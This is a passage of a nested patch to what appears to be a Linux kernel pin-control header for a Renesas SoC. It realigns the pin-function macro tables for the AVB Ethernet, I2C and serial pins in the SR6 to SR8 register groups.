+-#define IP2SR6_11_8	FM(AVB1_TD3)		FM(AVB1_MII_TD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR6_15_12	FM(AVB1_RD3)		FM(AVB1_MII_RD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR6_19_16	FM(AVB1_TXCREFCLK)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR6 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR6_3_0	FM(AVB1_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_7_4	FM(AVB1_MAGIC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_11_8	FM(AVB1_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_15_12	FM(AVB1_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_19_16	FM(AVB1_LINK)		FM(AVB1_MII_TX_ER)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_23_20	FM(AVB1_AVTP_MATCH)	FM(AVB1_MII_RX_ER)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_27_24	FM(AVB1_TXC)		FM(AVB1_MII_TXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_31_28	FM(AVB1_TX_CTL)		FM(AVB1_MII_TX_EN)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR6 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR6_3_0	FM(AVB1_RXC)		FM(AVB1_MII_RXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_7_4	FM(AVB1_RX_CTL)		FM(AVB1_MII_RX_DV)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_11_8	FM(AVB1_AVTP_PPS)	FM(AVB1_MII_COL)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_15_12	FM(AVB1_AVTP_CAPTURE)	FM(AVB1_MII_CRS)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_19_16	FM(AVB1_TD1)		FM(AVB1_MII_TD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_23_20	FM(AVB1_TD0)		FM(AVB1_MII_TD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_27_24	FM(AVB1_RD1)		FM(AVB1_MII_RD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_31_28	FM(AVB1_RD0)		FM(AVB1_MII_RD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR6 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR6_3_0	FM(AVB1_TD2)		FM(AVB1_MII_TD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_7_4	FM(AVB1_RD2)		FM(AVB1_MII_RD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_11_8	FM(AVB1_TD3)		FM(AVB1_MII_TD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_15_12	FM(AVB1_RD3)		FM(AVB1_MII_RD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_19_16	FM(AVB1_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR7 */
+-/* IP0SR7 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR7_3_0	FM(AVB0_AVTP_PPS)	FM(AVB0_MII_COL)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_7_4	FM(AVB0_AVTP_CAPTURE)	FM(AVB0_MII_CRS)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_11_8	FM(AVB0_AVTP_MATCH)	FM(AVB0_MII_RX_ER)	FM(CC5_OSCOUT)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_15_12	FM(AVB0_TD3)		FM(AVB0_MII_TD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_19_16	FM(AVB0_LINK)		FM(AVB0_MII_TX_ER)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_23_20	FM(AVB0_PHY_INT)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_27_24	FM(AVB0_TD2)		FM(AVB0_MII_TD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_31_28	FM(AVB0_TD1)		FM(AVB0_MII_TD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR7 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR7_3_0	FM(AVB0_RD3)		FM(AVB0_MII_RD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_7_4	FM(AVB0_TXCREFCLK)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_11_8	FM(AVB0_MAGIC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_15_12	FM(AVB0_TD0)		FM(AVB0_MII_TD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_19_16	FM(AVB0_RD2)		FM(AVB0_MII_RD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_23_20	FM(AVB0_MDC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_27_24	FM(AVB0_MDIO)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_31_28	FM(AVB0_TXC)		FM(AVB0_MII_TXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR7 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR7_3_0	FM(AVB0_TX_CTL)		FM(AVB0_MII_TX_EN)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_7_4	FM(AVB0_RD1)		FM(AVB0_MII_RD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_11_8	FM(AVB0_RD0)		FM(AVB0_MII_RD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_15_12	FM(AVB0_RXC)		FM(AVB0_MII_RXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_19_16	FM(AVB0_RX_CTL)		FM(AVB0_MII_RX_DV)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR7 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR7_3_0	FM(AVB0_AVTP_PPS)	FM(AVB0_MII_COL)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_7_4	FM(AVB0_AVTP_CAPTURE)	FM(AVB0_MII_CRS)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_11_8	FM(AVB0_AVTP_MATCH)	FM(AVB0_MII_RX_ER)	FM(CC5_OSCOUT)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_15_12	FM(AVB0_TD3)		FM(AVB0_MII_TD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_19_16	FM(AVB0_LINK)		FM(AVB0_MII_TX_ER)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_23_20	FM(AVB0_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_27_24	FM(AVB0_TD2)		FM(AVB0_MII_TD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_31_28	FM(AVB0_TD1)		FM(AVB0_MII_TD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR7 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR7_3_0	FM(AVB0_RD3)		FM(AVB0_MII_RD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_7_4	FM(AVB0_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_11_8	FM(AVB0_MAGIC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_15_12	FM(AVB0_TD0)		FM(AVB0_MII_TD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_19_16	FM(AVB0_RD2)		FM(AVB0_MII_RD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_23_20	FM(AVB0_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_27_24	FM(AVB0_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_31_28	FM(AVB0_TXC)		FM(AVB0_MII_TXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR7 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR7_3_0	FM(AVB0_TX_CTL)		FM(AVB0_MII_TX_EN)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_7_4	FM(AVB0_RD1)		FM(AVB0_MII_RD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_11_8	FM(AVB0_RD0)		FM(AVB0_MII_RD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_15_12	FM(AVB0_RXC)		FM(AVB0_MII_RXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_19_16	FM(AVB0_RX_CTL)		FM(AVB0_MII_RX_DV)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR8 */
+-/* IP0SR8 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR8_3_0	FM(SCL0)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_7_4	FM(SDA0)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_11_8	FM(SCL1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_15_12	FM(SDA1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_19_16	FM(SCL2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_23_20	FM(SDA2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_27_24	FM(SCL3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_31_28	FM(SDA3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR8 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR8_3_0	FM(SCL4)		FM(HRX2)		FM(SCK4)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_7_4	FM(SDA4)		FM(HTX2)		FM(CTS4_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_11_8	FM(SCL5)		FM(HRTS2_N)		FM(RTS4_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_15_12	FM(SDA5)		FM(SCIF_CLK2)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_19_16	F_(0, 0)		FM(HCTS2_N)		FM(TX4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_23_20	F_(0, 0)		FM(HSCK2)		FM(RX4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR8 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR8_3_0	FM(SCL0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_7_4	FM(SDA0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_11_8	FM(SCL1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_15_12	FM(SDA1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_19_16	FM(SCL2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_23_20	FM(SDA2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_27_24	FM(SCL3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_31_28	FM(SDA3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR8 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR8_3_0	FM(SCL4)		FM(HRX2)		FM(SCK4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
